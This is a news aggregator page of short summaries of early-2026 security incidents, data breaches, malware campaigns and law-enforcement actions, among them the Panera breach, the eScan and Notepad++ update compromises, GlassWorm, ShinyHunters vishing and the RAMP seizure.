All news in category “Incidents and Data Breaches”

🔒 Have I Been Pwned reports that a January 2026 data breach at Panera Bread exposed roughly 5.1 million unique email addresses and associated contact information, rather than 14 million distinct customers as initially claimed. The files, totaling about 760 MB, were published by the ShinyHunters extortion group after an alleged failed ransom attempt. ShinyHunters says it gained access via a Microsoft Entra SSO code as part of a broader vishing campaign targeting SSO providers. Panera has confirmed the incident to authorities and said the data is contact information.

🔒 CERT-UA reports that Russian-linked group Fancy Bear leveraged CVE-2026-21509 in Microsoft Office to target Ukrainian and EU organizations. Malicious Word documents downloaded a disguised LNK file over WebDAV, which deployed a DLL and an image containing shellcode. The campaign used COM hijacking and a scheduled task to restart explorer.exe and load a malicious EhStoreShell.dll, ultimately launching the Covenant C2 framework. Microsoft has published updates and service-side mitigations; affected customers should apply patches and the recommended registry changes.

🔒 Security researchers at Point Wild’s Lat61 team disclosed a Windows campaign that uses a multi-stage chain to establish persistent, memory-resident access and steal sensitive data. The attack starts with a small batch script that creates a per-user Registry Run key and launches a PowerShell loader which decodes Donut-generated shellcode and injects a heavily obfuscated .NET payload into memory. The modular Pulsar RAT supports live, interactive operator control alongside a parallel stealer, with stolen data exfiltrated as ZIP archives via Discord webhooks and Telegram bots.

⚠️A new report alleges two popular AI coding assistants, together used by roughly 1.5 million developers, are quietly copying everything they ingest to servers in China. Security researchers say the extensions capture editor content, code snippets, and related telemetry without clear user disclosure. The behavior appears systematic and persistent rather than incidental. Until vendors provide transparent remediation, developers and organizations should avoid unvetted extensions and perform immediate audits and containment.

🔒 A new Android remote access trojan (RAT) leverages the AI hosting platform Hugging Face to store and deliver malicious APK payloads, researchers at Bitdefender report. The campaign distributes a dropper app called TrustBastion that uses fake update dialogs to trick users into downloading an updater which redirects to repositories hosting polymorphic RAT APKs. Operators made frequent commits and shifted repositories to avoid takedowns, while the malware requests Accessibility and screen-recording permissions to capture credentials and relay data to command-and-control servers.

🔒 NationStates has confirmed a data breach after taking its browser-based game offline following a player-reported vulnerability that resulted in remote code execution on the production server. The attacker exploited a double-parsing and input sanitization flaw in the Dispatch Search feature to copy application code and user data, including email addresses, MD5 password hashes, login IPs, and browser User-Agent strings. NationStates says telegram contents were likely partially exposed, is wiping and rebuilding the production environment, has reported the incident to authorities, and expects service to be restored within two to five days.

🔒 A former Google engineer, Linwei Ding, was convicted by a US federal jury on 14 counts, including economic espionage and theft of trade secrets, after allegedly exfiltrating over 2,000 pages of sensitive AI technical documents. Prosecutors say he copied data into Apple Notes, converted it to PDFs, and uploaded the materials to a personal Google Cloud account to evade DLP controls. The stolen IP involved custom TPU and GPU orchestration software and SmartNIC designs intended for AI supercomputers, and the DoJ alleges Ding planned to support Chinese state-affiliated entities.

🔐 The maintainer of Notepad++ disclosed that state-sponsored actors compromised the app’s update delivery by hijacking infrastructure at the hosting-provider level, redirecting update traffic to malicious servers. The flaw affected the WinGUp updater’s verification logic, enabling intercepted traffic to fetch poisoned executables. In response, the site has been migrated to a new host and investigations are ongoing.

⚠ MicroWorld Technologies confirmed unknown attackers compromised the update infrastructure for its eScan antivirus and pushed a malicious update that deployed a multi-stage downloader to enterprise and consumer endpoints. The rogue update replaced the legitimate reload.exe with a binary signed by a fake or invalid signature; it executes three Base64-encoded PowerShell stages, includes an AMSI bypass and prevents automatic remediation. Kaspersky and Morphisec report hundreds of attempted infections mainly in India and neighboring countries. MicroWorld isolated affected update servers for hours and released a remediation package; impacted customers should contact the vendor for the fix.

🛡️ On January 30, 2026, threat actors used a compromised developer account to publish malicious updates to four Open VSX extensions, embedding the GlassWorm loader. The extensions — previously legitimate utilities with over 22,000 combined downloads — were removed after discovery. The loader decrypts and execute payloads at runtime, employing EtherHiding and Solana memos for C2 rotation. It targets macOS credentials and cryptocurrency wallets.

🔒 A threat actor is automating data-extortion attacks against publicly exposed MongoDB instances, compromising roughly 1,400 servers and leaving ransom notes demanding about 0.005 BTC (~$500). Researchers at Flare found over 208,500 publicly reachable MongoDB servers, with 3,100 allowing access without authentication and nearly half of those already wiped. There is no guarantee that paying ransoms will restore data or provide working keys. Victims are urged to avoid public exposure, enforce strong authentication, apply network controls, and keep instances updated.

🔒 A U.S. jury has convicted Linwei Ding, a former software engineer at Google, for stealing confidential AI supercomputer information and covertly sharing it with China-based technology firms. Prosecutors say Ding exfiltrated more than 2,000 pages of proprietary material — including details about TPU and GPU systems, orchestration software, and SmartNIC networking — by uploading files to his personal cloud account between May 2022 and April 2023. He later founded Shanghai Zhisuan Technology Co., sought government talent programs, and was convicted on multiple counts of economic espionage and trade secret theft after an 11-day San Francisco trial.

⚠️ Over recent months a global scam campaign has bombarded users with fraudulent cloud-storage renewal notices claiming payment failures and imminent deletion of photos and backups. The emails use auto-generated sender domains and links hosted on Google Cloud Storage that redirect to phishing pages impersonating cloud portals. Those pages run fake storage scans, promote unrelated affiliate products, and lead to checkout forms that collect credit card details. Delete these messages and verify billing only through official apps or websites.

🔒 Mandiant reports a recent wave of ShinyHunters attacks that combine targeted vishing and company‑branded phishing sites to capture SSO credentials and MFA codes. Attackers impersonate IT or helpdesk staff, guide victims through MFA approval or one‑time passcodes in real time, and enroll attacker-controlled MFA devices. With access to Okta, Microsoft Entra, or Google SSO dashboards they pivot into SaaS platforms (Salesforce, Microsoft 365, SharePoint, DocuSign, Slack, Atlassian, Dropbox, Google Drive) to steal and extort cloud data.

🔍 A security researcher published evidence that some Instagram private profiles returned links to user photos and captions inside the page HTML, making them visible to unauthenticated visitors on certain mobile devices. Researcher Jatin Banga showed the polaris_timeline_connection JSON object embedded encoded CDN links pointing to images that should have been private. In tests of private accounts he controlled or had permission to use, about 28% exposed captions and CDN links. Banga reported the issue to Meta on October 12, 2025; Meta later closed the report as "not applicable" and did not provide a root-cause analysis, though the behavior ceased roughly October 16.

🔍 HarfangLab detected a Farsi-speaking, Iran-aligned campaign codenamed RedKitten in January 2026 that targets NGOs and individuals documenting recent human rights abuses. The operation begins with a Farsi-named 7‑Zip archive containing macro-laced Excel files; embedded VBA macros, which analysts say show signs of LLM generation, drop a C# implant via AppDomainManager injection. The backdoor, SloppyMIO, uses GitHub and Google Drive for steganographic configuration retrieval and leverages Telegram for command-and-control, supporting multiple modules to run commands, collect and exfiltrate files, deploy payloads and establish persistence.

🔒 The FBI has seized control of RAMP (Russian Anonymous MarketPlace), replacing both its dark‑web and clearnet domains with law‑enforcement seizure banners. The action, carried out with the US Attorney’s Office for the Southern District of Florida and the Justice Department’s CCIPS, redirects the forum's nameservers to ns1.fbi.seized.gov and ns2.fbi.seized.gov. The takedown follows the 2024 arrest of alleged operator Mikhail Matveev and may provide authorities access to user data that could prompt further prosecutions.

📞 Google-owned Mandiant reported an expansion of ShinyHunters-style extortion activity that combines advanced voice phishing with fake credential-harvesting sites to capture SSO credentials and MFA codes to access cloud SaaS environments. The team is tracking multiple clusters (UNC6661, UNC6671, UNC6240) and observed attackers impersonating IT staff, registering attacker-controlled MFA devices, and exfiltrating data from services such as SharePoint and OneDrive. Mandiant recommends strengthening help-desk verification, improving logging and detection, restricting weak authentication methods, and adopting phishing-resistant options like FIDO2 or passkeys.

🔒 CERT Polska disclosed coordinated, destructive cyber attacks on December 29, 2025 that targeted more than 30 wind and photovoltaic farms, a manufacturing firm, and a large combined heat and power (CHP) plant. The agency attributed the activity to the cluster it calls Static Tundra, linked to Russia's FSB Center 16, while other vendors noted similarities to Sandworm. Attackers deployed multiple wipers — notably DynoWiper and a PowerShell-based LazyWiper — exploited vulnerable FortiGate appliances, harvested credentials and exfiltrated selected M365 data, but did not succeed in disrupting electricity production or heat delivery.

🔒 A coordinated international law enforcement operation led by Italy’s District Prosecutor’s Office of Catania, with support from Europol, Eurojust and Interpol, dismantled three large illegal IPTV platforms. Authorities seized infrastructure linked to IPTVItalia, migliorIPTV and DarkTV, identified 31 suspects and disrupted servers across Romania and Africa. Investigators report the services illegally retransmitted content from providers such as Sky, DAZN, Netflix and others while using cryptocurrencies and shell companies to obscure proceeds.